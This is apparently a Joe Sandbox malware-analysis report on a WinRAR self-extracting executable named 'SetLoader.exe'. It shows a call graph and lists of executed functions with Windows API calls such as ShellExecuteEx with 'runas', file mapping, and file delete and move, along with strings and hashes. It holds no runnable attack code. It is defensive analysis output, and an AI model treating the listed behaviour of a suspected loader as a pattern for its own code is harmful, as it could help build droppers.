62c6cd GlobalLock 26492->26493 26494 62c75c GlobalFree 26493->26494 26495 62c6dc __InternalCxxFrameHandler 26493->26495 26494->26489 26496 62c755 GlobalUnlock 26495->26496 26504 62c5b6 GdipAlloc 26495->26504 26496->26494 26499 62c72a GdipCreateHBITMAPFromBitmap 26500 62c740 26499->26500 26500->26496 26501->26451 26502->26453 26503->26446 26505 62c5d5 26504->26505 26506 62c5c8 26504->26506 26505->26496 26505->26499 26505->26500 26508 62c34d 26506->26508 26509 62c375 GdipCreateBitmapFromStream 26508->26509 26510 62c36e GdipCreateBitmapFromStreamICM 26508->26510 26511 62c37a 26509->26511 26510->26511 26511->26505 26513 61f975 26512->26513 26514 61f9cb GetModuleFileNameW 26513->26514 26515 61f9f8 26513->26515 26516 61f9df 26514->26516 26566 61b2b0 26515->26566 26516->26515 26518 61fa47 26579 638bc0 26518->26579 26519 61af2f 80 API calls 26520 620192 26519->26520 26523 6310f9 CatchGuardHandler 5 API calls 26520->26523 26522 61fa1b 26522->26518 26526 6201bd 78 API calls 26522->26526 26553 61fc4f 26522->26553 26527 61f94a 26523->26527 26524 61fa5a 26525 638bc0 26 API calls 26524->26525 26535 61fa6c ___vcrt_FlsGetValue 26525->26535 26526->26522 26564 6201fa GetModuleHandleW FindResourceW 26527->26564 26528 61fb92 26528->26553 26599 61b7b0 81 API calls 26528->26599 26530 61b8c0 79 API calls 26530->26535 26532 61fba9 ___std_exception_copy 26533 61b610 82 API calls 26532->26533 26532->26553 26536 61fbcf ___std_exception_copy 26533->26536 26535->26528 26535->26530 26535->26553 26593 61b610 26535->26593 26598 61b7b0 81 API calls 26535->26598 26538 61fbda _wcslen ___std_exception_copy ___vcrt_FlsGetValue 26536->26538 26536->26553 26600 623d10 MultiByteToWideChar 26536->26600 26540 61ffed 26538->26540 26538->26553 26556 623f47 WideCharToMultiByte 26538->26556 26558 61fd76 26538->26558 26559 6201b7 26538->26559 26601 620531 50 API calls __vsnprintf 26538->26601 26602 638a01 26 API calls 3 library calls 26538->26602 26540->26558 26603 63b52e 26 API calls 2 library calls 26540->26603 26542 6200b6 26607 639ea8 26 API calls 2 library calls 26542->26607 26543 620126 26544 62015c 26543->26544 26550 6201bd 78 API calls 26543->26550 26547 638bc0 26 API calls 26544->26547 26546 62010e 26608 6201d8 78 API calls 26546->26608 26549 620175 26547->26549 26551 638bc0 26 API calls 26549->26551 26550->26543 26551->26553 26553->26519 26554 62000c 26604 639ea8 26 API calls 2 library calls 26554->26604 26555 620064 26605 6201d8 78 API calls 26555->26605 26556->26538 26558->26543 26606 63b52e 26 API calls 2 library calls 26558->26606 26609 6313f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 26559->26609 26561 6201bc 26565 61f951 26564->26565 26565->26460 26567 61b2ba 26566->26567 26568 61b334 CreateFileW 26567->26568 26569 61b34f GetLastError 26568->26569 26573 61b39b 26568->26573 26570 61da1e 6 API calls 26569->26570 26571 61b36c 26570->26571 26572 61b370 CreateFileW GetLastError 26571->26572 26571->26573 26572->26573 26575 61b395 26572->26575 26574 61b3df 26573->26574 26576 61b3c5 SetFileTime 26573->26576 26577 6310f9 CatchGuardHandler 5 API calls 26574->26577 26575->26573 26576->26574 26578 61b41e 26577->26578 26578->26522 26580 638bf9 26579->26580 26581 638bfd 26580->26581 26592 638c25 26580->26592 26610 63bc7b 20 API calls _abort 26581->26610 26583 638f49 26585 6310f9 CatchGuardHandler 5 API calls 26583->26585 26584 638c02 26611 636649 26 API calls _abort 26584->26611 26587 638f56 26585->26587 26587->26524 26588 638c0d 26589 6310f9 CatchGuardHandler 5 API calls 26588->26589 26591 638c19 26589->26591 26591->26524 26592->26583 26612 638ae0 5 API calls CatchGuardHandler 26592->26612 26594 61b61c 26593->26594 26596 61b623 26593->26596 26594->26535 26596->26594 26597 61b151 GetStdHandle ReadFile GetLastError GetLastError GetFileType 26596->26597 26613 617c95 77 API calls 26596->26613 26597->26596 26598->26535 26599->26532 26600->26538 26601->26538 26602->26538 26603->26554 26604->26555 26605->26558 26606->26542 26607->26546 26608->26543 26609->26561 26610->26584 26611->26588 26612->26592 26613->26596 26614 63bab0 26622 63d3ff 26614->26622 26618 63bacc 26619 63bad9 26618->26619 26630 63bae0 11 API calls 26618->26630 26621 63bac4 26623 63d2e8 _abort 5 API calls 26622->26623 26624 63d426 26623->26624 26625 63d43e TlsAlloc 26624->26625 26627 63d42f 26624->26627 26625->26627 26626 6310f9 CatchGuardHandler 5 API calls 26628 63baba 26626->26628 26627->26626 26628->26621 26629 63ba29 20 API calls 2 library calls 26628->26629 26629->26618 26630->26621 26631 62f191 26632 62f19a GetTempPathW 26631->26632 26652 62ea83 _wcslen _wcsrchr 26631->26652 26639 62f1ba 26632->26639 26634 614c00 _swprintf 51 API calls 26634->26639 26635 62f717 26637 6310f9 CatchGuardHandler 5 API calls 26635->26637 26636 61bccb 8 API calls 26636->26639 26638 62f732 26637->26638 26671 6313f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 26638->26671 26639->26634 26639->26636 26640 62f1ee SetDlgItemTextW 26639->26640 26640->26652 26642 62f741 26643 62ed57 SetWindowTextW 26643->26652 26646 61dd18 5 API calls 26646->26652 26647 6366ae 22 API calls 26647->26652 26649 62eb4b SetFileAttributesW 26650 62ec05 GetFileAttributesW 26649->26650 26663 62eb65 _abort _wcslen 26649->26663 26650->26652 26654 62ec17 DeleteFileW 26650->26654 26652->26635 26652->26638 26652->26643 26652->26646 26652->26647 26652->26649 26652->26663 26664 62c5dd GetCurrentDirectoryW 26652->26664 26666 61c3de 11 API calls 26652->26666 26667 61c367 FindClose 26652->26667 26668 62d76e 76 API calls 3 library calls 26652->26668 26670 62d5dd 6 API calls CatchGuardHandler 26652->26670 26654->26652 26656 62ec28 26654->26656 26658 614c00 _swprintf 51 API calls 26656->26658 26657 62ef35 GetDlgItem SetWindowTextW SendMessageW 26657->26663 26659 62ec48 GetFileAttributesW 26658->26659 26659->26656 26661 62ec5d MoveFileW 26659->26661 26660 62ef75 SendMessageW 26660->26652 26661->26652 26662 62ec75 MoveFileExW 26661->26662 26662->26652 26663->26650 26663->26652 26663->26660 26665 61d8ac 51 API calls 2 library calls 26663->26665 26669 62d41c 99 API calls CatchGuardHandler 26663->26669 26664->26652 26665->26663 26666->26652 26667->26652 26668->26652 26669->26657 26670->26652 26671->26642 26672 611075 26673 6211a5 41 API calls 26672->26673 26674 61107a 26673->26674 26677 631932 29 API calls 26674->26677 26676 611084 26677->26676 26678 6110b5 26679 61668f 43 API calls 26678->26679 26680 6110ba 26679->26680 26683 631932 29 API calls 26680->26683 26682 6110c4 26683->26682 26684 6308f6 26686 63089f 26684->26686 26685 630d3a ___delayLoadHelper2@8 14 API calls 26685->26686 26686->26685 26687 61f0d7 26695 61f0ed __InternalCxxFrameHandler 26687->26695 26688 61f25d 26691 61f291 26688->26691 26698 61f08e 26688->26698 26690 61f2b2 26692 622ee4 2 API calls 26690->26692 26691->26690 26704 616c92 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26691->26704 26696 61f254 26692->26696 26695->26688 26695->26696 26702 61ca4c 91 API calls __EH_prolog3 26695->26702 26703 62ab94 119 API calls CatchGuardHandler 26695->26703 26699 61f0d3 26698->26699 26700 61f096 26698->26700 26699->26691 26700->26699 26705 623ca6 26700->26705 26702->26695 26703->26695 26704->26690 26708 63017f 26705->26708 26713 6222ef 26708->26713 26710 630196 SendDlgItemMessageW 26711 62d864 5 API calls 26710->26711 26712 623cc6 26711->26712 26712->26699 26714 6222fd 26713->26714 26714->26710 26715 61b9ba 26716 61b9c8 26715->26716 26717 61b9cf 26715->26717 26718 61b9dc GetStdHandle 26717->26718 26722 61b9eb 26717->26722 26718->26722 26719 61ba43 WriteFile 26719->26722 26720 61ba14 WriteFile 26721 61ba0f 26720->26721 26720->26722 26721->26720 26721->26722 26722->26716 26722->26719 26722->26720 26722->26721 26724 61bad5 26722->26724 26726 617b1e 78 API calls 26722->26726 26727 617e45 77 API calls 26724->26727 26726->26722 26727->26716 26728 61d4bd 26729 61d4cf _abort 26728->26729 26732 6231c2 26729->26732 26735 623184 GetCurrentProcess GetProcessAffinityMask 26732->26735 26736 61d526 26735->26736 26737 61b45f 26743 61b469 26737->26743 26738 61b48d 26739 6310f9 CatchGuardHandler 5 API calls 26738->26739 26741 61b50b 26739->26741 26740 61b5b6 26742 61b5dd SetFilePointer 26740->26742 26742->26738 26744 61b5fa GetLastError 26742->26744 26743->26738 26743->26740 26743->26742 26745 61b1e6 79 API calls 26743->26745 26744->26738 26745->26740 26746 62f05c 26754 62f07f 26746->26754 26749 62f717 26750 6310f9 CatchGuardHandler 5 API calls 26749->26750 26751 62f732 26750->26751 26805 6313f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 26751->26805 26753 62f741 26759 62ea83 _wcslen _wcsrchr 26754->26759 26776 62fafc 26754->26776 26755 62ed57 SetWindowTextW 26755->26759 26758 61dd18 5 API calls 26758->26759 26759->26749 26759->26751 26759->26755 26759->26758 26760 6366ae 22 API calls 26759->26760 26762 62eb4b SetFileAttributesW 26759->26762 26775 62eb65 _abort _wcslen 26759->26775 26798 62c5dd GetCurrentDirectoryW 26759->26798 26800 61c3de 11 API calls 26759->26800 26801 61c367 FindClose 26759->26801 26802 62d76e 76 API calls 3 library calls 26759->26802 26804 62d5dd 6 API calls CatchGuardHandler 26759->26804 26760->26759 26763 62ec05 GetFileAttributesW 26762->26763 26762->26775 26763->26759 26766 62ec17 DeleteFileW 26763->26766 26766->26759 26768 62ec28 26766->26768 26770 614c00 _swprintf 51 API calls 26768->26770 26769 62ef35 GetDlgItem SetWindowTextW SendMessageW 26769->26775 26771 62ec48 GetFileAttributesW 26770->26771 26771->26768 26773 62ec5d MoveFileW 26771->26773 26772 62ef75 SendMessageW 26772->26759 26773->26759 26774 62ec75 MoveFileExW 26773->26774 26774->26759 26775->26759 26775->26763 26775->26772 26799 61d8ac 51 API calls 2 library calls 26775->26799 26803 62d41c 99 API calls CatchGuardHandler 26775->26803 26777 62fb06 _abort _wcslen 26776->26777 26778 62fd7e 26777->26778 26781 61bccb 8 API calls 26777->26781 26779 6310f9 CatchGuardHandler 5 API calls 26778->26779 26780 62fd8f 26779->26780 26780->26759 26782 62fc54 26781->26782 26783 62fc73 ShellExecuteExW 26782->26783 26806 61d563 8 API calls CatchGuardHandler 26782->26806 26783->26778 26785 62fc86 26783->26785 26787 62fca3 IsWindowVisible 26785->26787 26788 62fcb8 WaitForInputIdle 26785->26788 26789 62fd0e CloseHandle 26785->26789 26786 62fc6b 26786->26783 26787->26788 26790 62fcae ShowWindow 26787->26790 26791 63004d 6 API calls 26788->26791 26793 62fd1c 26789->26793 26790->26788 26792 62fcd0 26791->26792 26792->26789 26794 62fce3 GetExitCodeProcess 26792->26794 26793->26778 26796 62fd75 ShowWindow 26793->26796 26794->26789 26795 62fcf6 26794->26795 26795->26789 26796->26778 26798->26759 26799->26775 26800->26759 26801->26759 26802->26759 26803->26769 26804->26759 26805->26753 26806->26786

                                              Executed Functions

                                              Function 0062DAE0 Relevance: 98.8, APIs: 47, Strings: 9, Instructions: 750windowfilesleepCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00611366: GetDlgItem.USER32(00000000,00003021), ref: 006113AA
                                                • Part of subcall function 00611366: SetWindowTextW.USER32(00000000,006465F4), ref: 006113C0
                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0062DC06
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0062DC24
                                              • IsDialogMessageW.USER32(?,?), ref: 0062DC37
                                              • TranslateMessage.USER32(?), ref: 0062DC45
                                              • DispatchMessageW.USER32(?), ref: 0062DC4F
                                              • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0062DC72
                                              • GetDlgItem.USER32(?,00000068), ref: 0062DCB8
                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0062DCD3
                                              • SendMessageW.USER32(00000000,000000C2,00000000,006465F4), ref: 0062DCE6
                                                • Part of subcall function 0062F77B: _wcslen.LIBCMT ref: 0062F7A5
                                              • SetFocus.USER32(00000000), ref: 0062DCED
                                              • _swprintf.LIBCMT ref: 0062DD4C
                                                • Part of subcall function 00614C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00614C13
                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 0062DDAF
                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 0062DDD7
                                              • GetTickCount.KERNEL32 ref: 0062DDF5
                                              • _swprintf.LIBCMT ref: 0062DE0D
                                              • GetLastError.KERNEL32(?,00000011), ref: 0062DE3F
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,00000000,00000000,00000000,?,00000800), ref: 0062DE92
                                              • _swprintf.LIBCMT ref: 0062DEC9
                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp,?,?,?,?,00663482,00000200), ref: 0062DF1D
                                              • GetCommandLineW.KERNEL32(?,?,?,?,00663482,00000200), ref: 0062DF33
                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00663482,00000400,00000001,00000001,?,?,?,?,00663482,00000200), ref: 0062DF8A
                                              • ShellExecuteExW.SHELL32(?), ref: 0062DFB2
                                              • WaitForInputIdle.USER32(?,00002710), ref: 0062DFE6
                                              • Sleep.KERNEL32(00000064,?,?,?,?,00663482,00000200), ref: 0062DFFA
                                              • UnmapViewOfFile.KERNEL32(?,?,0000421C,00663482,00000400,?,?,?,?,00663482,00000200), ref: 0062E023
                                              • CloseHandle.KERNEL32(?,?,?,?,?,00663482,00000200), ref: 0062E02C
                                              • _swprintf.LIBCMT ref: 0062E05F
                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0062E0BE
                                              • SetDlgItemTextW.USER32(?,00000065,006465F4), ref: 0062E0D5
                                              • GetDlgItem.USER32(?,00000065), ref: 0062E0DE
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0062E0ED
                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0062E0FC
                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0062E1A9
                                              • _wcslen.LIBCMT ref: 0062E1FF
                                              • _swprintf.LIBCMT ref: 0062E229
                                              • SendMessageW.USER32(?,00000080,00000001,004F01B1), ref: 0062E273
                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0062E28D
                                              • GetDlgItem.USER32(?,00000068), ref: 0062E296
                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0062E2AC
                                              • GetDlgItem.USER32(?,00000066), ref: 0062E2C6
                                              • SetWindowTextW.USER32(00000000,0066589A), ref: 0062E2E8
                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0062E348
                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0062E35B
                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001D8C0,00000000,?), ref: 0062E3FE
                                              • EnableWindow.USER32(00000000,00000000), ref: 0062E4CC
                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0062E50E
                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0062E532
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Item$MessageText$Send$Window_swprintf$File$ErrorLast$DialogLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleIdleInputLineMappingModuleNameParamShellSleepTickTranslateUnmapWait__vswprintf_c_l
                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$C:\Users\user\Desktop\SetLoader.exe$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$runas$winrarsfxmappingfile.tmp
                                              • API String ID: 3499002864-3316464774
                                              • Opcode ID: 0d717ac21b4eb6e805870e8a51fdb64e58571f05d793b1f06679917b34d5a437
                                              • Instruction ID: 6530d6b0952b9b2856736c8acce7108e66b9d0e4843921519288a18d59e1bd5d
                                              • Opcode Fuzzy Hash: 0d717ac21b4eb6e805870e8a51fdb64e58571f05d793b1f06679917b34d5a437
                                              • Instruction Fuzzy Hash: 0E42D771940B64BEEB21AB60EC4AFFE37ABAB01701F045029F545AB2D1CB754A84CF65
                                              Function 0063037C Relevance: 38.7, APIs: 15, Strings: 7, Instructions: 208filesleeptimeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 0062290A: GetModuleHandleW.KERNEL32 ref: 00622937
                                                • Part of subcall function 0062290A: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00622949
                                                • Part of subcall function 0062290A: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00622973
                                                • Part of subcall function 0062C5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0062C5E5
                                                • Part of subcall function 0062CCD9: OleInitialize.OLE32(00000000), ref: 0062CCF2
                                                • Part of subcall function 0062CCD9: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0062CD29
                                                • Part of subcall function 0062CCD9: SHGetMalloc.SHELL32(0065C460), ref: 0062CD33
                                              • GetCommandLineW.KERNEL32 ref: 006303C9
                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 006303F3
                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 00630404
                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00630455
                                                • Part of subcall function 0062FFDD: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0062FFFE
                                                • Part of subcall function 0062FFDD: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00630038
                                                • Part of subcall function 00621421: _wcslen.LIBCMT ref: 00621445
                                              • CloseHandle.KERNEL32(00000000), ref: 0063045C
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SetLoader.exe,00000800), ref: 00630476
                                              • SetEnvironmentVariableW.KERNEL32(sfxname,C:\Users\user\Desktop\SetLoader.exe), ref: 00630482
                                              • GetLocalTime.KERNEL32(?), ref: 0063048D
                                              • _swprintf.LIBCMT ref: 006304E1
                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 006304F6
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 006304FD
                                              • LoadIconW.USER32(00000000,00000064), ref: 00630514
                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001DAE0,00000000), ref: 00630565
                                              • Sleep.KERNEL32(?), ref: 00630593
                                              • CloseHandle.KERNEL32 ref: 0063061F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop\SetLoader.exe$STARTDLG$pPe$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                              • API String ID: 4208810040-3514407146
                                              • Opcode ID: 9cb00f6c7a04e9db9eb1a528c25889987506f0daa3c141ae677e595e45bcf7e8
                                              • Instruction ID: e5c76a98eebac3141b67eec1576511f4281d9f16c2150e388ad6a50243eac776
                                              • Opcode Fuzzy Hash: 9cb00f6c7a04e9db9eb1a528c25889987506f0daa3c141ae677e595e45bcf7e8
                                              • Instruction Fuzzy Hash: CB712870504360AFE361AF74EC1AFAB7BDBAB46701F00541DF54593292DF358988CBA6
                                              Function 0061F963 Relevance: 23.4, APIs: 3, Strings: 10, Instructions: 684COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,5CB4B331), ref: 0061F9CD
                                                • Part of subcall function 0061E208: _wcslen.LIBCMT ref: 0061E210
                                                • Part of subcall function 00622663: _wcslen.LIBCMT ref: 00622669
                                                • Part of subcall function 00623D10: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,5CB4B331,?,?,5CB4B331,00000001,0061DA04,00000000,5CB4B331,?,00010418,?,?), ref: 00623D2C
                                              • _wcslen.LIBCMT ref: 0061FD00
                                              • __fprintf_l.LIBCMT ref: 0061FE50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _wcslen$ByteCharFileModuleMultiNameWide__fprintf_l
                                              • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                              • API String ID: 2646189078-2291855099
                                              • Opcode ID: 3bb537dad536dc999d26b6de76973fe5ff91f3fd64874ca61019ddf2100816b8
                                              • Instruction ID: e4d6941ca5ef5fea253eda9cfabc1ba64aebc96c24bbe7b67d87a34a0ccc018c
                                              • Opcode Fuzzy Hash: 3bb537dad536dc999d26b6de76973fe5ff91f3fd64874ca61019ddf2100816b8
                                              • Instruction Fuzzy Hash: A34204B1900659ABDF24DFA4D841BEE77B6FF18700F04452EF905AB281EB719A81CB94
                                              Function 0062C652 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100memorywindowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 760 62c652-62c66f FindResourceW 761 62c675-62c686 SizeofResource 760->761 762 62c76b 760->762 761->762 763 62c68c-62c69b LoadResource 761->763 764 62c76d-62c771 762->764 763->762 765 62c6a1-62c6ac LockResource 763->765 765->762 766 62c6b2-62c6c7 GlobalAlloc 765->766 767 62c763-62c769 766->767 768 62c6cd-62c6d6 GlobalLock 766->768 767->764 769 62c75c-62c75d GlobalFree 768->769 770 62c6dc-62c6fa call 634250 768->770 769->767 774 62c755-62c756 GlobalUnlock 770->774 775 62c6fc-62c71e call 62c5b6 770->775 774->769 775->774 780 62c720-62c728 775->780 781 62c743-62c751 780->781 782 62c72a-62c73e GdipCreateHBITMAPFromBitmap 780->782 781->774 782->781 783 62c740 782->783 783->781
                                              APIs
                                              • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0062DA3D,00000066), ref: 0062C665
                                              • SizeofResource.KERNEL32(00000000,?,?,?,0062DA3D,00000066), ref: 0062C67C
                                              • LoadResource.KERNEL32(00000000,?,?,?,0062DA3D,00000066), ref: 0062C693
                                              • LockResource.KERNEL32(00000000,?,?,?,0062DA3D,00000066), ref: 0062C6A2
                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0062DA3D,00000066), ref: 0062C6BD
                                              • GlobalLock.KERNEL32(00000000,?,?,?,?,?,0062DA3D,00000066), ref: 0062C6CE
                                              • GlobalUnlock.KERNEL32(00000000), ref: 0062C756
                                                • Part of subcall function 0062C5B6: GdipAlloc.GDIPLUS(00000010), ref: 0062C5BC
                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0062C737
                                              • GlobalFree.KERNEL32(00000000), ref: 0062C75D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                              • String ID: FjuKc$PNG
                                              • API String ID: 541704414-2951311883
                                              • Opcode ID: c6e8fbbd26fabad9a84f3e6f033177b59b645330560c1fedc83200bae90199da
                                              • Instruction ID: 10e4c5b9bc29a56cf28ec67c4f96e2285dd643863f9e271998db8b9cde645436
                                              • Opcode Fuzzy Hash: c6e8fbbd26fabad9a84f3e6f033177b59b645330560c1fedc83200bae90199da
                                              • Instruction Fuzzy Hash: EE319175200B12AFD7109F25EC88D5BBFAAEF47B61B141528F90693261EB31DC44CFA1
                                              Function 0061C4A8 Relevance: 7.6, APIs: 5, Instructions: 111fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 933 61c4a8-61c4e3 call 631590 936 61c4e5-61c4f0 FindFirstFileW 933->936 937 61c548-61c551 FindNextFileW 933->937 938 61c563-61c606 call 62268b call 61e27e call 623724 * 3 936->938 940 61c4f2-61c507 call 61da1e 936->940 937->938 939 61c553-61c561 GetLastError 937->939 944 61c60b-61c62c call 6310f9 938->944 941 61c53d-61c543 939->941 948 61c522-61c52b GetLastError 940->948 949 61c509-61c520 FindFirstFileW 940->949 941->944 952 61c53b 948->952 953 61c52d-61c530 948->953 949->938 949->948 952->941 953->952 956 61c532-61c535 953->956 956->952 958 61c537-61c539 956->958 958->941
                                              APIs
                                              • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,0061C39F,000000FF,?,?,?,?,006187BC,?,?,00000000), ref: 0061C4E6
                                                • Part of subcall function 0061DA1E: _wcslen.LIBCMT ref: 0061DA59
                                              • FindFirstFileW.KERNEL32(?,00000000,?,?,00000800,?,?,0061C39F,000000FF,?,?,?,?,006187BC,?,?), ref: 0061C516
                                              • GetLastError.KERNEL32(?,?,00000800,?,?,0061C39F,000000FF,?,?,?,?,006187BC,?,?,00000000,0000003A), ref: 0061C522
                                              • FindNextFileW.KERNEL32(?,?,00000000,?,?,?,0061C39F,000000FF,?,?,?,?,006187BC,?,?,00000000), ref: 0061C549
                                              • GetLastError.KERNEL32(?,?,0061C39F,000000FF,?,?,?,?,006187BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 0061C555
                                              Memory Dump Source
